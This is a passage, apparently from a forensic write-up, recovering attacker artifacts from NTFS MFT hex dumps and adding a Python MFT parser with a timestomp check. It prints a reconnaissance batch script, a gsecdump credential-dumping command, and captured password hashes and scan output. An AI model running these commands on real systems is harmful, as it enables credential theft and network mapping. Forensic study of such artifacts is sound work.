                                                    0000300: 0000 0000 0000 0200 4c00 0000 1800 0100  ........L.......
                                                    0000310: 1d00 0000 0000 0100 6168 88b7 3ecc cd01  ........ah..>...
                                                    0000320: 6168 88b7 3ecc cd01 6168 88b7 3ecc cd01  ah..>...ah..>...
                                                    0000330: 6168 88b7 3ecc cd01 0000 0000 0000 0000  ah..>...........
                                                    0000340: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
                                                    0000350: 0503 6800 2e00 6f00 7500 7400 0000 0000  ..h...o.u.t.....
                                                    0000360: 8000 0000 2801 0000 0000 1800 0000 0100  ....(...........
                                                    0000370: 0c01 0000 1800 0000 616d 6972 733a 5045  ........amirs:PE
                                                    0000380: 5452 4f2d 4d41 524b 4554 3a46 3243 3645  TRO-MARKET:F2C6E
                                                    0000390: 4644 3337 4231 3034 4344 3731 4439 3141  FD37B104CD71D91A
                                                    00003a0: 3038 3144 3442 3337 3836 313a 3734 3444  081D4B37861:744D
                                                    00003b0: 3041 3632 3737 3737 3642 3436 4634 4242  0A6277776B46F4BB
                                                    00003c0: 3744 3044 3732 3343 3545 4444 0d0a 464c  7D0D723C5EDD..FL
                                                    00003d0: 442d 5341 5249 5941 4448 2d34 3324 3a50  D-SARIYADH-43$:P
                                                    00003e0: 4554 524f 2d4d 4152 4b45 543a 3030 3030  ETRO-MARKET:0000
                                                    00003f0: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
                                                    0000400: 3030 3030 3030 3030 3030 3030 3a44 3332  000000000000:D32
                                                    0000410: 3341 3043 4243 3532 3037 3330 4237 3446  3A0CBC520730B74F
                                                    0000420: 4331 3839 3544 3533 3346 4534 330d 0a73  C1895D533FE43..s
                                                    0000430: 7973 6261 636b 7570 3a63 7572 7265 6e74  ysbackup:current
                                                    0000440: 3a43 3241 3339 3135 4446 3245 4337 3945  :C2A3915DF2EC79E
                                                    0000450: 4537 3331 3038 4542 3438 3037 3341 4342  E73108EB48073ACB
                                                    0000460: 373a 4537 4136 4632 3730 4631 4241 3536  7:E7A6F270F1BA56
                                                    0000470: 3241 3930 4532 4331 3333 4139 3544 3230  2A90E2C133A95D20
                                                    0000480: 3537 0d0a 0000 0000 ffff ffff 8279 4711  57...........yG.


                                                    mft entry for system6.bat


                                                    00002f0: 0000 0000 0000 4649 4c45 3000 0300 09a3  ......FILE0.....
                                                    0000300: 5a05 0000 0000 0300 0100 3800 0100 e001  Z.........8.....
                                                    0000310: 0000 0004 0000 0000 0000 0000 0000 0300  ................
                                                    0000320: 0000 fa2e 0000 0500 0000 0000 0000 1000  ................
                                                    0000330: 0000 6000 0000 0000 0000 0000 0000 4800  ..`...........H.
                                                    0000340: 0000 1800 0000 add9 9741 38cc cd01 add9  .........A8.....
                                                    0000350: 9741 38cc cd01 add9 9741 38cc cd01 add9  .A8......A8.....
                                                    0000360: 9741 38cc cd01 2000 0000 0000 0000 0000  .A8... .........
                                                    0000370: 0000 0000 0000 0000 0000 1301 0000 0000  ................
                                                    0000380: 0000 0000 0000 0000 0000 0000 0000 3000  ..............0.
                                                    0000390: 0000 7000 0000 0000 0000 0000 0200 5800  ..p...........X.
                                                    00003a0: 0000 1800 0100 1c00 0000 0000 0100 add9  ................
                                                    00003b0: 9741 38cc cd01 add9 9741 38cc cd01 add9  .A8......A8.....
                                                    00003c0: 9741 38cc cd01 add9 9741 38cc cd01 0000  .A8......A8.....
                                                    00003d0: 0000 0000 0000 0000 0000 0000 0000 2000  .............. .
                                                    00003e0: 0000 0000 0000 0b03 7300 7900 7300 7400  ........s.y.s.t.
                                                    00003f0: 6500 6d00 3600 2e00 6200 6100 7400 8000  e.m.6...b.a.t...
                                                    0000400: 0000 d000 0000 0000 1800 0000 0100 b800  ................
                                                    0000410: 0000 1800 0000 4065 6368 6f20 6f66 660d  ......@echo off.
                                                    0000420: 0a69 7063 6f6e 6669 6720 2f61 6c6c 203e  .ipconfig /all >
                                                    0000430: 3e20 633a 5c77 696e 646f 7773 5c77 6562  > c:\windows\web
                                                    0000440: 7569 5c73 7973 7465 6d2e 646c 6c0d 0a6e  ui\system.dll..n
                                                    0000450: 6574 2073 6861 7265 203e 3e20 633a 5c77  et share >> c:\w
                                                    0000460: 696e 646f 7773 5c77 6562 7569 5c73 7973  indows\webui\sys
                                                    0000470: 7465 6d2e 646c 6c0d 0a6e 6574 2073 7461  tem.dll..net sta
                                                    0000480: 7274 203e 3e20 633a 5c77 696e 646f 7773  rt >> c:\windows
                                                    0000490: 5c77 6562 7569 5c73 7973 7465 6d2e 646c  \webui\system.dl
                                                    00004a0: 6c0d 0a6e 6574 2076 6965 7720 3e3e 2063  l..net view >> c
                                                    00004b0: 3a5c 7769 6e64 6f77 735c 7765 6275 695c  :\windows\webui\
                                                    00004c0: 7379 7374 656d 2e64 6c6c 0d0a 0d0a ffff  system.dll......
                                                    00004d0: ffff 8279 4711 0000 0000 0000 0000 0000  ...yG.
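Every FILE record on this page has the same shape: a header with the update sequence array, then resident $STANDARD_INFORMATION, $FILE_NAME and $DATA attributes, which is why the .bat contents and timestamps can be read straight out of the hex. As an added example (not part of the original write-up), this Python parser applies the fixups, walks the attributes, recovers the filename, both sets of timestamps and the resident data, and flags the SI-before-FN creation-time mismatch a backdated script would show; it runs on the system3.bat record transcribed from the dump above. The zero padding to the 1024-byte record size and the USN written back into the sector tails are constructed, since the dump only shows the 0x160 used bytes.

```python
"""Parse an NTFS MFT FILE record and recover what the dumps above show by eye:
filename, $STANDARD_INFORMATION and $FILE_NAME timestamps, resident $DATA."""
import struct
from datetime import datetime, timedelta, timezone

# system3.bat FILE record, transcribed from the hex dump above starting at the
# "FILE0" signature (dump offset 0x388): the 0x160 bytes the header says are used.
SYSTEM3_BAT_RECORD_HEX = """
4649 4c45 3000 0300 6356 5b05 0000 0000 0300 0100 3800 0100 6001 0000 0004 0000
0000 0000 0000 0000 0300 0000 fc2e 0000 0800 0000 0000 0000 1000 0000 6000 0000
0000 0000 0000 0000 4800 0000 1800 0000 6783 2063 3acc cd01 c2e5 2263 3acc cd01
c2e5 2263 3acc cd01 c2e5 2263 3acc cd01 2000 0000 0000 0000 0000 0000 0000 0000
0000 0000 1301 0000 0000 0000 0000 0000 0000 0000 0000 0000 3000 0000 7000 0000
0000 0000 0000 0200 5800 0000 1800 0100 831d 0000 0000 0200 6783 2063 3acc cd01
6783 2063 3acc cd01 6783 2063 3acc cd01 6783 2063 3acc cd01 0000 0000 0000 0000
0000 0000 0000 0000 2000 0000 0000 0000 0b03 7300 7900 7300 7400 6500 6d00 3300
2e00 6200 6100 7400 8000 0000 5000 0000 0000 1800 0000 0100 3800 0000 1800 0000
4065 6368 6f20 6f66 6620 0d0a 6469 7220 2f53 2043 3a5c 2a2e 6477 6720 3e20 633a
5c77 696e 646f 7773 5c77 6562 7569 5c68 7474 7073 2e64 6c6c ffff ffff 8279 4711
"""
RECORD_SIZE, SECTOR_SIZE = 1024, 512
ATTR_END = 0xFFFFFFFF
STANDARD_INFORMATION, FILE_NAME, DATA = 0x10, 0x30, 0x80
TIME_KEYS = ("created", "modified", "mft_modified", "accessed")

def filetime_to_datetime(ft: int) -> datetime:
    """64-bit FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def apply_fixups(record: bytearray) -> None:
    """NTFS overwrites the last 2 bytes of every sector of the record with the
    update sequence number and keeps the originals in the USA; restore them."""
    usa_off, usa_count = struct.unpack_from("<HH", record, 4)
    usn = bytes(record[usa_off:usa_off + 2])
    for i in range(1, usa_count):
        tail = i * SECTOR_SIZE - 2
        if record[tail:tail + 2] != usn:
            raise ValueError(f"fixup mismatch in sector {i}: torn or corrupt record")
        record[tail:tail + 2] = record[usa_off + 2 * i:usa_off + 2 * i + 2]

def _times(value: bytes, start: int) -> dict:
    ticks = struct.unpack_from("<4Q", value, start)
    return dict(zip(TIME_KEYS, map(filetime_to_datetime, ticks)))

def parse_mft_record(raw: bytes) -> dict:
    record = bytearray(raw)
    if record[:4] != b"FILE":
        raise ValueError("not a FILE record")
    apply_fixups(record)
    first_attr, flags = struct.unpack_from("<HH", record, 0x14)
    rec = {"record_number": struct.unpack_from("<I", record, 0x2C)[0],
           "in_use": bool(flags & 1), "name": None,
           "si_times": None, "fn_times": None, "data": None}
    off = first_attr
    while off + 8 <= len(record):
        attr_type, length = struct.unpack_from("<II", record, off)
        if attr_type == ATTR_END or length == 0:
            break
        non_resident, name_len = record[off + 8], record[off + 9]
        if not non_resident:  # value lives inside the record, as for every file above
            value_len, value_off = struct.unpack_from("<IH", record, off + 0x10)
            value = bytes(record[off + value_off:off + value_off + value_len])
            if attr_type == STANDARD_INFORMATION:
                rec["si_times"] = _times(value, 0)
            elif attr_type == FILE_NAME:
                rec["fn_times"] = _times(value, 8)
                rec["name"] = value[66:66 + 2 * value[64]].decode("utf-16-le")
            elif attr_type == DATA and name_len == 0:  # unnamed (default) stream
                rec["data"] = value
        off += length
    return rec

def timestomp_indicator(rec: dict) -> bool:
    """$SI times are settable through the file API, $FN times are not: an $SI
    creation time earlier than the $FN one is the classic backdating tell."""
    return rec["si_times"]["created"] < rec["fn_times"]["created"]

def load_page_record() -> bytes:
    """Rebuild the on-disk record: dump bytes zero-padded to 1024 bytes, with the
    USN written into both sector tails (constructed; the dump stops at 0x160)."""
    record = bytearray(bytes.fromhex(SYSTEM3_BAT_RECORD_HEX))
    record += bytes(RECORD_SIZE - len(record))
    usa_off = struct.unpack_from("<H", record, 4)[0]
    for tail in (SECTOR_SIZE - 2, 2 * SECTOR_SIZE - 2):
        record[tail:tail + 2] = record[usa_off:usa_off + 2]
    return bytes(record)

if __name__ == "__main__":
    r = parse_mft_record(load_page_record())
    print(r["name"], hex(r["record_number"]), "in use" if r["in_use"] else "unallocated")
    for k in TIME_KEYS:
        print(f"{k:>13}: SI {r['si_times'][k]}  FN {r['fn_times'][k]}")
    print("timestomp indicator:", timestomp_indicator(r))
    print(r["data"].decode("ascii"))
```

The same function works unchanged on the other records above, and on a raw $MFT carved from an image when fed 1024-byte slices.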

                                                    gsecdump command found 

                                                    261942659 c:\windows\webui\gsecdump.exe -a >> c:\windows\webui\svchost.dll

                                                    Data collected from host script

                                                    365846531 Windows IP Configuration
                                                     365846561         Host Name . . . . . . . . . . . . : fld-sariyadh-43
                                                     365846623         Primary Dns Suffix  . . . . . . . : petro-market.org
                                                     365846686         Node Type . . . . . . . . . . . . : Hybrid
                                                     365846739         IP Routing Enabled. . . . . . . . : No
                                                     365846788         WINS Proxy Enabled. . . . . . . . : No
                                                     365846837         DNS Suffix Search List. . . . . . : petro-market.org
                                                     365846903 Ethernet adapter Local Area Connection:
                                                     365846948         Connection-specific DNS Suffix  . :
                                                     365846995         Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter
                                                     365847079         Physical Address. . . . . . . . . : 00-0C-29-A7-7C-6E
                                                     365847143         Dhcp Enabled. . . . . . . . . . . : No
                                                     365847192         IP Address. . . . . . . . . . . . : 172.16.223.187
                                                     365847253         Subnet Mask . . . . . . . . . . . : 255.255.255.0
                                                     365847313         Default Gateway . . . . . . . . . : 172.16.223.8
                                                     365847372         DNS Servers . . . . . . . . . . . : 172.16.150.10
                                                     365847432         Primary WINS Server . . . . . . . : 172.16.223.47
                                                     365847492 Server Name            Remark
                                                     365847525 -------------------------------------------------------------------------------
                                                     365847606 \\DC-USTXHOU
                                                     365847687 \\ENG-USTXHOU-148
                                                     365847768 \\FLD-SARIYADH-43
                                                     365847849 \\IIS-SARIYADH-03
                                                     365847930 The command completed successfully.
                                                     365847969 Alias name     administrators
                                                     365848000 Comment        Administrators have complete and unrestricted access to the computer/domain
                                                     365848094 Members
                                                     365848105 -------------------------------------------------------------------------------
                                                     365848186 Administrator
                                                     365848201 Amir
                                                     365848207 PETRO-MARKET\amirs
                                                     365848227 PETRO-MARKET\Domain Admins
                                                     365848255 sysbackup
                                                     365848266 The command completed successfully.
                                                     365848305 There are no entries in the list.
                                                     365848344 Share name   Resource                        Remark
                                                     365848399 -------------------------------------------------------------------------------
                                                     365848480 ADMIN$       C:\WINDOWS                      Remote Admin
                                                     365848561 C$           C:\                             Default share
                                                     365848642 IPC$                                         Remote IPC
                                                     365848723 The command completed successfully.
                                                     365848762 These Windows services are started:
                                                     365848801    Application Layer Gateway Service
                                                     365848839    Automatic Updates
                                                     365848861    COM+ Event System
                                                     365848883    Computer Browser
                                                     365848904    Cryptographic Services
                                                     365848931    DCOM Server Process Launcher
                                                     365848964    DHCP Client
                                                     365848980    Distributed Link Tracking Client
                                                     365849017    DNS Client
                                                     365849032    Error Reporting Service
                                                     365849060    Event Log
                                                     365849074    Help and Support
                                                     365849095    IPSEC Services
                                                     365849114    Logical Disk Manager
                                                     365849139    Microsoft Device Manager
                                                     365849168    Net Logon
                                                     365849182    Network Connections
                                                     365849206    Network Location Awareness (NLA)
                                                     365849243    Plug and Play
                                                     365849261    Print Spooler
                                                     365849279    Protected Storage
                                                     365849301    Remote Access Connection Manager
                                                     365849338    Remote Procedure Call (RPC)
                                                     365849370    Remote Registry
                                                     365849390    Secondary Logon
                                                     365849410    Security Accounts Manager
                                                     365849440    Server
                                                     365849451    Shell Hardware Detection
                                                     365849480    SSDP Discovery Service
                                                     365849507    System Event Notification
                                                     365849537    System Restore Service
                                                     365849564    Task Scheduler
                                                     365849583    TCP/IP NetBIOS Helper
                                                     365849609    Telephony
                                                     365849623    Terminal Services
                                                     365849645    Themes
                                                     365849656    WebClient
                                                     365849670    Windows Audio
                                                     365849688    Windows Firewall/Internet Connection Sharing (ICS)
                                                     365849743    Windows Management Instrumentation
                                                     365849782    Windows Time
                                                     365849799    Wireless Zero Configuration
                                                     365849831    Workstation
                                                     365849849 The command completed successfully.
                                                     365849888 Scan of 254 IPs started at Tue Nov 27 03:22:59 2012
                                                     365849943 -------------------------------------------------------------------------------
                                                     365850024 172.16.223.8
                                                     365850038 Responded in 0 ms.
                                                     365850058 0 hops away
                                                     365850071 Responds with ICMP unreachable: No
                                                     365850107 TCP ports: 21 80
                                                     365850129 TCP 21:
                                                     365850138 [220 (vsFTPd 2.3.0)]
                                                     365850162 TCP 80:
                                                     365850171 [HTTP/1.1 200 OK Date: Tue, 27 Nov 2012 00:23:08 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Fri, 23 Nov 2012 15:06:45 GMT ETag: "2194f-b1-4cf2aee9810d2]
                                                     365850334 -------------------------------------------------------------------------------
                                                     365850415 172.16.223.47
                                                     365850430 Responded in 0 ms.
                                                     365850450 0 hops away
                                                     365850463 Responds with ICMP unreachable: No
                                                     365850499 TCP ports: 80 445
                                                     365850522 TCP 80:
                                                     365850531 [HTTP/1.1 200 OK Content-Length: 1433 Content-Type: text/html Content-Location: http://172.16